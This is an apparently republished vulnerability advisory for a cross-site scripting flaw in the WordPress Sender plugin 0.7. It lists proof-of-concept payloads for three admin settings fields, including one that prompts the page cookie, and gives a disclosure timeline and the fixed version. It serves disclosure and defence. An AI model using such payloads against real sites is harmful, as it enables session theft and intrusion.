WordPress Sender 0.7 Cross Site Scripting

2015.12.18
Credit: Madhu Akula
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Plugin Name : Sender Effected Version : 0.7 (and most probably lower version's if any) Vulnerability : A3-Cross-Site Scripting (XSS) Identified by : Madhu Akula Technical Details Minimum Level of Access Required : Administrator PoC - (Proof of Concept) : The following fields put the payload as below http://localhost/wp-admin/admin.php?page=sndr_settings&action=go_pro bws_license_key = ?><img src=x onerror=prompt(document.cookie);> http://localhost/wp-admin/admin.php?page=sndr_settings sndr_from_custom_name = ?><script>alert(1)</script> sndr_from_email = ?><script>alert(2)</script> Vulnerable Parameter : bws_license_key, sndr_from_custom_name, sndr_from_email Type of XSS : Reflected / Stored Fixed in : 0.8 http://wordpress.org/plugins/sender/changelog/ Disclosure Timeline Vendor Contacted : 2014-08-04 Plugin Status : Updated on 2014-08-07 Public Disclosure : October 3, 2015 CVE Number : Not assigned yet Plugin Description : This plugin allows you send mails to all users or to certain categories of users via several clicks. To send letters, you can use the php functions such as sending emails, wordpress functions, or send an email through the SMTP server. Also, the plugin provides a bulk mailing for a certain period of time.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top